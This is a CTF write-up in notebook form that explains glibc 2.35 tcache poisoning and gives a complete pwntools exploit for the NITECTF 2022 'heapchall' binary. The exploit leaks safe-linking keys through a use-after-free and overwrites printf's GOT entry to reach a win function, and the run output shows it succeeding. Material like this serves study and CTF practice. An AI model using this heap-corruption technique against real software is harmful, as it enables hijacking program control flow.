# Tcache Poisoning Attack

The tcache poisoning attack allows us to trick malloc into returning a pointer to an arbitrary location (e.g., stack, GOT table).

This attack is similar to fastbin corruption attack.

Reference: https://github.com/shellphish/how2heap/blob/master/glibc_2.35/tcache_poisoning.c

```c
/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx) // TCACHE_MAX_BINS (=64),  size <= 1024
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache_key;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);     // At most TCACHE_FILL_COUNT (=7)
}

/* Convert a chunk address to a user mem pointer without correcting
   the tag.  */
#define chunk2mem(p) ((void*)((char*)(p) + CHUNK_HDR_SZ))

/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
```

## Example: heapchall

Source: NITECTF 2022

Actions:

- `slot[a] = malloc(b)`, 
- `scanf("%s", slot[a])`
- `free slot[a]`. This action forgets to set `slot[a]` to NULL
- `puts( slot[a] )`

In [1]:
from pwn import *
from pwnlib import gdb

bin_filename = './heapchall'
elf = ELF(bin_filename)

context.terminal = ['tmux', 'new-window']
context.arch = elf.arch

libc_filename = './libc.so.6'
libc = ELF(libc_filename)

ld_filename = 'ld-linux-x86-64.so.2'

[*] '/ctf/work/tcache-poisoning/heapchall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/ctf/work/tcache-poisoning/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled


In [2]:
!cp {bin_filename} {bin_filename}.patch
bin_filename = bin_filename + '.patch'
!patchelf --set-interpreter {ld_filename} {bin_filename}
!patchelf --set-rpath '.' {bin_filename}
elf = ELF(bin_filename)

[*] '/ctf/work/tcache-poisoning/heapchall.patch'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3ff000)
    RUNPATH:  b'.'


In [3]:
!strings libc.so.6 | grep 'GNU C Library'

GNU C Library (GNU libc) stable release version 2.35.


In [4]:
def allocate(io: tube, slot: int, sz: int):
    io.recvuntil(b'Option:')
    io.sendline(b'1')
    io.recvuntil(b'Slot:')
    io.sendline(b'%d' % slot)
    io.recvuntil(b'Size:')
    io.sendline(b'%d' % sz)

def edit(io, slot, content):
    io.recvuntil(b'Option:')
    io.sendline(b'2')
    io.recvuntil(b'Slot:')
    io.sendline(b'%d' % slot)
    io.recvuntil(b'content:')
    io.sendline(content)

def free(io, slot):
    io.recvuntil(b'Option:')
    io.sendline(b'3') 
    io.recvuntil(b'Slot: ')
    io.sendline(b'%d' % slot)

def view(io: tube, slot):
    io.recvuntil(b'Option:')
    io.sendline(b'4')
    io.recvuntil(b'Slot: ')
    io.sendline(b'%d' % slot)
    return io.recvline(keepends=False)

def leak(io, slot):
    leak = view(io, slot)
    leak = u64(leak + b'\x00'*(8-len(leak)))
    return leak


Print the tcache state (if we download the glibc with debug symbol):

```
pwndbg> tcache
pwndbg> tcachebins
pwndbg> bins
pwndbg> heapinfo
pwndbg> parseheap
```

In [5]:
def exploit(io: tube):
    count = 7 + 2  # 7 for tcache, 2 for 
    sz = 0x100
    for i in range(count):
        # the size must <= 0x400 so that the chunk is fit in tcache
        # the size must > 0x80 otherwise the chunk is allocated in fastbin
        allocate(io, i, sz) 
    for i in range(count):
        free(io, i)
    addr = [leak(io, i) for i in range(count)]
    print(','.join(map(hex, addr)))
    
    # addr[0] is the protection key
    # addr[i] = key ^ true_addr[i]
    # addr[1]^addr[0] = (key ^ true_addr[0]) ^ (key ^ NULL) = true_addr[0]
    
    key = addr[0]
    overwrite_addr = elf.got['printf']
    edit(io, 6, p64( key ^ overwrite_addr ))
    
    allocate(io, 0, sz)
    allocate(io, 1, sz)  # overwrite_addr
    edit(io, 1, p64(elf.sym['win']))

In [6]:
import os
context.aslr = True
io = process(bin_filename)
libc_base = io.libs()[os.path.realpath(libc_filename)]
print(f'{hex(libc_base)=}')
# io = gdb.debug([bin_filename], gdbscript=f"""
# c
# """)
try:
    exploit(io)
    with context.local(log_level='debug'):
        io.sendline(b'echo you win!')
        io.sendline(b'exit')
        print(io.recvall(timeout=2))
        io.kill()
    io.poll(block=True)
except Exception as e:
    io.kill()
    raise e

[x] Starting local process './heapchall.patch'
[+] Starting local process './heapchall.patch': pid 1514776
hex(libc_base)='0x7f1b0ad66000'
0xfae,0xfaed0e,0xfaec1e,0xfaeb6e,0xfaea7e,0xfae94e,0xfae85e,0xf58ce0,0x0
[DEBUG] Sent 0xe bytes:
    b'echo you win!\n'
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[x] Receiving all data
[x] Receiving all data: 1B
[DEBUG] Received 0x28 bytes:
    b'Winner winner, chicken dinner!\n'
    b'you win!\n'
[x] Receiving all data: 41B
[+] Receiving all data: Done (41B)
[*] Stopped process './heapchall.patch' (pid 1514776)
b' Winner winner, chicken dinner!\nyou win!\n'
